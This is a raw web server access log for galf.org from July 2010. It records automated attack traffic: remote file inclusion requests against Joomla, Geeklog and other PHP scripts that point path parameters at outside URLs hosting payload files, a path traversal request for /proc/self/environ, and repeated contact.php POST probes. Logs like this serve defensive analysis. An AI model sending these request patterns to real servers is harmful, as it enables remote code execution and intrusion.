77.78.97.82 - - [25/Jul/2010:18:19:53 -0700] "GET /logs//index.php?option=com_remository&Itemid=&mosConfig.absolute.path=http://tubiwityu.fileave.com/kill9/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.78.97.82 - - [25/Jul/2010:18:19:53 -0700] "GET /index.php?option=com_remository&Itemid=&mosConfig.absolute.path=http://tubiwityu.fileave.com/kill9/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [25/Jul/2010:18:20:37 -0700] "GET /logs/access_100329.log%20%20//plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [25/Jul/2010:18:20:37 -0700] "GET /plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [25/Jul/2010:18:20:37 -0700] "GET /logs//plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.114.41.85 - - [25/Jul/2010:18:20:41 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
93.114.41.85 - - [25/Jul/2010:18:20:41 -0700] "POST /logs/access_100712.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
93.114.41.85 - - [25/Jul/2010:18:20:41 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
93.114.41.85 - - [25/Jul/2010:18:20:48 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
93.114.41.85 - - [25/Jul/2010:18:20:48 -0700] "POST /logs/access_100712.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
93.114.41.85 - - [25/Jul/2010:18:20:48 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
77.221.145.35 - - [25/Jul/2010:18:20:57 -0700] "POST /logs/access_090928.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
77.221.145.35 - - [25/Jul/2010:18:20:57 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
77.221.145.35 - - [25/Jul/2010:18:20:57 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
93.114.41.85 - - [25/Jul/2010:18:20:58 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
93.114.41.85 - - [25/Jul/2010:18:20:58 -0700] "POST /logs/access_100712.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
93.114.41.85 - - [25/Jul/2010:18:20:58 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
93.114.41.85 - - [25/Jul/2010:18:21:06 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
93.114.41.85 - - [25/Jul/2010:18:21:06 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
93.114.41.85 - - [25/Jul/2010:18:21:07 -0700] "POST /logs/access_100712.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
77.78.97.82 - - [25/Jul/2010:18:21:14 -0700] "GET /logs/access_091221.log//index.php?option=com_remository&Itemid=&mosConfig.absolute.path=http://tubiwityu.fileave.com/kill9/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.145.35 - - [25/Jul/2010:18:21:16 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
78.110.50.110 - - [25/Jul/2010:18:21:19 -0700] "GET /logs/access_090921.log%20%20//plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:18:21:25 -0700] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:18:21:25 -0700] "GET /logs/access_090928.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:18:21:25 -0700] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 200 7664 "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:18:21:30 -0700] "GET /logs/access_100118.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:21:33 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:21:33 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:21:33 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:21:39 -0700] "POST /contact.php HTTP/1.0" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:21:40 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:21:41 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:21:41 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:21:41 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:21:42 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:21:42 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:21:42 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:21:42 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:21:43 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:21:43 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:21:44 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:21:44 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:21:46 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:21:49 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:21:50 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:21:50 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:21:51 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
211.233.11.170 - - [25/Jul/2010:18:22:48 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
211.233.11.170 - - [25/Jul/2010:18:22:48 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
211.233.11.170 - - [25/Jul/2010:18:22:48 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:22:50 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:22:50 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:22:51 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:22:51 -0700] "POST /logs/access_090928.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:22:51 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
77.221.145.35 - - [25/Jul/2010:18:22:51 -0700] "POST /logs/access_090928.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
77.221.145.35 - - [25/Jul/2010:18:22:51 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
77.221.145.35 - - [25/Jul/2010:18:22:51 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:22:51 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:22:51 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:22:51 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:22:52 -0700] "POST /logs/access_090928.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:22:52 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:22:52 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:22:52 -0700] "POST /logs/access_090928.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:22:52 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:22:52 -0700] "POST /logs/access_090928.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:22:52 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:22:52 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:22:52 -0700] "POST /logs/access_090928.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:22:53 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:22:53 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:22:53 -0700] "POST /logs/access_090928.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:22:53 -0700] "POST /logs/access_090928.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:18:23:04 -0700] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:18:23:04 -0700] "GET /logs/access_100301.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:18:23:04 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.145.35 - - [25/Jul/2010:18:23:08 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
109.235.249.248 - - [25/Jul/2010:18:23:44 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
109.235.249.248 - - [25/Jul/2010:18:23:44 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
109.235.249.248 - - [25/Jul/2010:18:23:44 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:24:16 -0700] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:24:17 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:24:18 -0700] "GET /logs/access_100301.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:25:09 -0700] "GET /logs/access_091228.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:25:09 -0700] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:25:10 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.78.97.82 - - [25/Jul/2010:18:25:12 -0700] "GET /logs/access_100614.log//index.php?option=com_remository&Itemid=&mosConfig.absolute.path=http://tubiwityu.fileave.com/kill9/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.78.97.82 - - [25/Jul/2010:18:25:12 -0700] "GET /logs//index.php?option=com_remository&Itemid=&mosConfig.absolute.path=http://tubiwityu.fileave.com/kill9/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.78.97.82 - - [25/Jul/2010:18:25:12 -0700] "GET /index.php?option=com_remository&Itemid=&mosConfig.absolute.path=http://tubiwityu.fileave.com/kill9/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.124.193.12 - - [25/Jul/2010:18:25:22 -0700] "GET /logs/access_100628.log/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
78.110.50.110 - - [25/Jul/2010:18:25:33 -0700] "GET /logs/access_090921.log//plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:26:02 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:26:02 -0700] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:26:02 -0700] "GET /logs/access_091228.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [25/Jul/2010:18:26:02 -0700] "GET /logs/access_091228.log//plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:26:07 -0700] "GET /logs/access_091102.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.78.97.82 - - [25/Jul/2010:18:26:21 -0700] "GET /logs/access_091221.log//index.php?option=com_remository&Itemid=&mosConfig.absolute.path=http://tubiwityu.fileave.com/kill9/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:26:21 -0700] "POST /logs/access_090928.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:26:21 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:26:21 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:26:22 -0700] "POST /logs/access_090928.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:26:22 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:26:22 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:26:24 -0700] "POST /logs/access_090928.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:26:24 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:26:27 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:26:27 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:26:27 -0700] "POST /logs/access_090928.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:26:28 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:26:29 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:26:30 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:26:30 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:26:31 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:26:32 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:26:32 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:26:33 -0700] "POST /logs/access_090928.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:26:34 -0700] "POST /logs/access_090928.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:18:26:34 -0700] "POST /logs/access_090928.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:18:26:37 -0700] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:18:26:37 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:18:26:37 -0700] "GET /logs/access_091228.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:18:26:37 -0700] "GET /logs/access_091102.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:18:26:47 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:18:26:47 -0700] "GET /logs/access_100301.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:18:26:47 -0700] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.145.35 - - [25/Jul/2010:18:27:06 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
77.221.145.35 - - [25/Jul/2010:18:27:06 -0700] "POST /logs/access_100712.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
77.221.145.35 - - [25/Jul/2010:18:27:06 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:27:18 -0700] "GET /logs/access_091102.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:27:18 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:27:18 -0700] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:27:19 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:27:19 -0700] "GET /logs/access_091102.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:27:19 -0700] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.145.35 - - [25/Jul/2010:18:27:24 -0700] "POST /logs/access_100712.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
77.221.145.35 - - [25/Jul/2010:18:27:24 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
77.221.145.35 - - [25/Jul/2010:18:27:24 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
